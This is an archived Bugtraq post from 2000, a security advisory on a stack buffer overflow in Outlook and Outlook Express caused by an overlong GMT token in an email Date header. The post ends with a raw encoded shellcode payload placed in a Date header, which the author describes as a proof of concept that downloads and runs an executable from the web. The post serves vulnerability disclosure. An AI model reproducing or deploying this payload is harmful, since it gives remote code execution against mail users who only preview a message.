Bugtraq mailing list archives
Buffer Overflow in MS Outlook Email Clients
From: ripper () HOTKEY NET AU (Aaron Drew)
Date: Wed, 19 Jul 2000 20:02:27 +1000
_______________________________________________________________ Security Advisory: Buffer Overflow in MS Outlook & Outlook Express Email Clients Date: 18th July 2000 Author: Aaron Drew (mailto:ripper () wollongong hotkey net au) Versions Affected: MS Outlook 97/2000 and MS Outlook Express 4/5 _______________________________________________________________ A bug in a shared component of Microsoft Outlook and Outlook Express mail clients can allow a remote user to write arbitrary data to the stack. This bug has been found to exist in all versions of MS Outlook and Outlook Express on both Windows 95/98 and Windows NT 4. The vulnerability lies in the parsing of the GMT section of the date field in the header of an email. Bound checking on the token representing the GMT is not properly handled. This bug can be witnessed by opening an email with an exceptionally long string directly preceding the GMT specification in the Date header field such as: Date: Fri, 13 July 2000 14:16:06 +1000xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx The bug lies in the shared library INETCOMM.DLL and has been successfully exploited on Windows 95, 98 and NT with both Outlook and Outlook Express. The execution of this code is performed differently under each client. Under Outlook Express, the buffer overflow occurs as soon as the user tries to view the mail folder containing email with a malicious date header. Under Microsoft Outlook, the overflow occurs when attempting to preview, read, reply or forward any email with a malicious date header. Under MS Outlook a user may delete or save an email to disk without exploitation. Whilst some mail transport systems seem to modify 8-bit header data or lines over 70 characters in length preventing direct exploitation, these restrictions seem to be avoided by encoding a message with an exploit date field as a MIME attachment in a Outlook's MIME attached message format. These messages also overflow the stack when read, previewed, replied to or forwarded. Microsoft was notified of this bug on July 3. Attached is a proof-of-point exploit that, when placed in the header field of a message or MIME attached message, will download and execute an executable from the web. (In this particular case it will launch MS Freecell) _______________________________________________________________ DISCLAIMER The information within this document may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information. Any use of this information lays within the user's responsibility. _______________________________________________________________ Date: Sun, 7 May 2000 11:20:46 +10006ÝÃ^@Ç^à Ä-qþÿÿì3ɱ¡H0âúè¾À^PPÿðÝ3íûfïþü3ÉéûC2À×ÀuøCQSVÿÀ^«YâêC2À×ÀuøCSÿÀ^ð3ÉéüC2À×ÀuøCQSVÿÀ^«Yâê3ÀfHÑà3ÒPRÿWìð3ÒRRRRRÿWð3ÒRRRR×ÂÜþÿÿRPÿWøW3ÒfJÑâRVPÿWü3ÒR×ÂöþÿÿRÿWÜÿ7VPØÿWàSÿWä3ÒBR×ÂöþÿÿRÿWèPÿ¬À^ËÅÒÎÅ̳²ßìãòåáôßì÷òéôåßìãìïóå×éîÅøåãÇìïâáìÁììïã×ÉÎÉÎÅÔÉîôåòîåôÏðåîÁÉîôåòîåôÃìïóåÈáîäìåÉîôåòîåôÏðåîÕòìÁÉîôåòîåôÒåáäÆéìåèôô𺯯±¹²®±¶¸®°°±®°±°¯ôåóô®åøå
Current thread:
- "Best Practices for Secure Web Development" whitepaper, (continued)
- "Best Practices for Secure Web Development" whitepaper Razvan Peteanu (Jul 18)
- [Security Announce] MDKSA-2000:021 nfs-utils update Linux Mandrake Security Team (Jul 18)
- Microsoft Security Bulletin (MS00-043) Microsoft Product Security (Jul 19)
- Remotely Exploitable Buffer Overflow in Outlook "Malformed E-mail MIME Header" Vulnerability Ussr Labs (Jul 19)
- Re: [RHSA-2000:043-02] Updated package for nfs-utils available Joe Laffey (Jul 18)
- Re: [RHSA-2000:043-02] Updated package for nfs-utils available Kurt Seifried (Jul 18)
- @stake Security Advisory: NetZero Password Algorithm Brian Carrier (Jul 18)
- Re: @stake Security Advisory: NetZero Password Algorithm Dan Kaminsky (Jul 18)
- Re: @stake Security Advisory: NetZero Password Algorithm Damien Miller (Jul 20)
- Multiple bugs in Alibaba 2.0 Prizm (Jul 18)
- Buffer Overflow in MS Outlook Email Clients Aaron Drew (Jul 19)
- Re: Buffer Overflow in MS Outlook Email Clients bednar () RAK ISTERNET SK (Jul 18)
- Re: Buffer Overflow in MS Outlook Email Clients chris.paget () ANALYSYS COM (Jul 19)
- Re: Buffer Overflow in MS Outlook Email Clients Elias Levy (Jul 21)